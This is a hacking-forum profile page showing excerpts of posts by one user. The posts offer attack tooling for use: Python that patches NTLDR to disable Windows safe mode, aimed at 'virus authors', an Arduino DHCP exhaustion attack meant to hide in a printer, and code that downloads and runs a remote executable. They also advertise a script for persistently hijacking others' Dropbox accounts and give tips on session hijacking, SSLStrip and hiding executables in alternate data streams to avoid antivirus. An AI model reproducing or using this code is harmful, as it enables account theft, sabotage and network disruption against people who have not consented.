Dedicated Members

About sablefoxx

  • Rank
    Hak5 Ninja
  • Birthday 01/01/1911

Profile Information

  • Location
    /Milkyway/Terran System/Earth/
  • Interests
    Greatest Albums:
    The Dark Side of the Moon - Pink Floyd
    Give Up - The Postal Service
    The Classics - Ratatat

23,297 profile views
  1. @ibegreengoblin -- I sent you a PM, I'd also recommend modifying your post here to be a little less incriminating.
  2. sablefoxx


    Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades! http://ge.tt/8nETsM5?c And if you're feeling a bit evil, disable safe mode (XP/2k3): # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte
  3. Meterpreter is good at this. -- http://lmgtfy.com/?q=meterpreter+tutorial
  4. Yeah that doesn't seem like a very mean virus. You can probably just boot into safe mode and modify the Group Policies or regkeys to regain access. On a side note to virus authors don't forget to disable safe mode by patching the NTLDR like so: # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __na
  5. DHCP attacks are fun, I recently wrote an Arduino sketch to perform DHCP Exhaustion attacks on (ethernet) networks. Thinking about hiding in a network printer or something. /*** * Net~nade: The hand held DHCP grenade (exhaustion attack) * Written by: Sablefoxx */ #include <Ethernet.h> #include <EthernetDHCP.h> /* Function Prototypes */ void requestIp(byte); void displayMac(byte); const char* addressToString(const uint8_t* ip); /* Setup */ void setup() { Serial.begin(9600); } /* Main Loop */ void loop() { byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01
  6. You shouldn't make system calls if possible (they're evil), it's actually easy to download files in pure python. Here's a quick example; import urllib from subprocess import Popen path = 'C:\\file.exe' # Local path url = 'http://remote-server.com/file.exe' # Remote path connection = urllib.urlopen(url) remoteFile = connection.read() connection.close() try: localFile = open(path, 'w') localFile.write(remoteFile) localFile.close() Popen(path) # Execute whatever "path" points to except IOError: print '***** OMFG ERROR: Location is not writable %
  7. sablefoxx


    I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully). (Go forth and learn python! http://docs.python.org) http://dl.dropbox.com/u/341940/pyblade.tar.gz
  8. http://www.instructables.com/id/Remove-U3-from-flash-drive/
  9. sablefoxx


    Note: a lot of the time even when the credentials are sent over HTTPS the cookie is still sent in clear text, so you can still use session hijacking. This is why this type of attack is effective, even if you can't get the user/password you can still gain access to an account.
  10. sablefoxx


    If you could write an exploit to do this you'd already have code running on the machine, which would make it pointless to disable HTTPS because you already owned the box, just hook the encryption dll.
  11. sablefoxx


    1. Facebook sends the cookie in clear-text even if you log in via SSL. 2. Gmail is now only done over SSL, no custom settings required, which mitigates this attack somewhat (certain other Google apps are not done over SSL though), but you can just use SSLStrip to get around that. Also look into using Hamster/Ferret, it can attack all sites and not just a predefined list (and almost as easy to use)
  12. sablefoxx


    I'm hoping not to have to use AV-Kill and instead just hide everything. Killing processes is messy and loud and I'd rather focus on stealth. I'm currently looking into hiding executable files in alternate data streams. For those of you who aren't familiar with alternate data streams they work like so; E:\>touch test.txt E:\>echo hello world >> test.txt E:\>cat test.txt hello world E:\>dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:35 AM 14 test.txt
  13. sablefoxx


    (Sorry about the long update interval, recently moved 1,784 miles to attend college) Lots of new features in the upcoming build, plus made the code a lot more modular so it will be easier for kids to play with. No AV kill in the new build at this time, but I will look into the Metasploit kill scripts, thx for the tip.